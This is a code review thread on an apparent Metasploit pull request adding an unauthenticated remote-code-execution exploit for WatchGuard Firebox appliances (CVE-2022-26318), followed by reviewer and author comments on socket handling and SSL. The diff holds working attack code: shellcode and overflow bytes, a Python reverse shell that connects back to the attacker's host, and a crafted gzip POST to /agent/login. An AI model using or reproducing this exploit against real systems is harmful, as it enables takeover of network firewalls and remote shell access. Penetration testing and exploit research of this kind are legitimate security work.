modules/exploits/linux/http/watchguard_firebox_unauth_rce_cve_2022_26318.rb

```diff
@@ -0,0 +1,183 @@
+    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 P@\x00\x00"
+    payload << "\x00\x00\x00h\xf9@\x00\x00\x00\x00\x00 P@\x00\x00\x00\x00\x00\x00\x00\x0e\xd6A\x00\x00\x00\x00\x00\xb1\xd5A"
+    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00}^@\x00\x00\x00\x00\x00"
+    payload << "\x00\x00\x00\x00\x00\x00\x00\x00|^@\x00\x00\x00\x00\x00\xad\xd2A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    payload << "\x00\x00\x00\x0e\xd6A\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    payload << "\x00\x00\x00\x00\x00\x00\x00\x00*\xa9@\x00\x00\x00\x00\x00H\x8d=\x9d\x00\x00\x00\xbeA\x02\x00\x00\xba\xb6"
+    payload << "\x01\x00\x00\xb8\x02\x00\x00\x00\x0f\x05H\x89\x05\x92\x00\x00\x00H\x8b\x15\x93\x00\x00\x00H\x8d5\x94\x00"
+    payload << "\x00\x00H\x8b=}\x00\x00\x00\xb8\x01\x00\x00\x00\x0f\x05H\x8b=o\x00\x00\x00\xb8\x03\x00\x00\x00\x0f\x05\xb8;"
+    payload << "\x00\x00\x00H\x8d=?\x00\x00\x00H\x89= \x00\x00\x00H\x8d5A\x00\x00\x00H\x895\x1a\x00\x00\x00H\x8d5\x0b\x00"
+    payload << "\x00\x001\xd2\x0f\x05\xb8<\x00\x00\x00\x0f\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00#{datastore['SHELL']}\x00#{@py_fname}\x00\x00\x00\x00\x00\x00\x00\x00\x00\xef"
+    payload << "\x01\x00\x00\x00\x00\x00\x00"
+    # shell code to launch an reverse interactive python shell
+    # The Watchguard appliance has a very restricted linux command set, readonly root filesystem and no unix shells installed
+    # The interactive Python shell (-i) is for now the only way to get shell access
+    payload << 'import socket;from subprocess import call; from os import dup2;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'.encode
+    payload << "s.connect((\"#{datastore['LHOST']}\",#{datastore['LPORT']})); dup2(s.fileno(),0); dup2(s.fileno(),1); dup2(s.fileno(),2);".encode
+    payload << "call([\"#{datastore['SHELL']}\",\"-i\"]);".encode
+    return Zlib.gzip(payload)
+  end
+
+  def create_final_payload
+    http_payload = "POST /agent/login HTTP/1.1\r\n"
+    http_payload << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
+    http_payload << "User-Agent: CVE-2022-26318\r\n"
+    http_payload << "Accept-Encoding: gzip, deflate\r\n"
+    http_payload << "Accept: */*\r\n"
+    http_payload << "Connection: close\r\n"
+    http_payload << "Content-Encoding: gzip\r\n"
+
+    bof_payload = create_bof_payload
+
+    http_payload << "Content-Length: #{bof_payload.length}\r\n"
+    http_payload << "\r\n"
+
+    return http_payload.encode + bof_payload
+  end
+
+  def send_payload(payload)
+    sock = Rex::Socket::SslTcp.create(
```

Comment:
What is the reason for constructing the `http_payload` like this and sending it over this socket? Also should the user have the option to enable / disable SSL?

Reply:
Tried to send the payload with `send_request_cgi` and `send_request_raw` but could not get this to work, so I used the native socket option which works and is pretty reliable. 
On the SSL question. Default all appliances are configured with SSL and there is no option to configure the appliance without SSL.

Reply:
Got it working now with `send_request_cgi`. See https://github.com/rapid7/metasploit-framework/pull/18915/commits/7f02daf37dcbe477db938c9ac5a88145d6d5171d.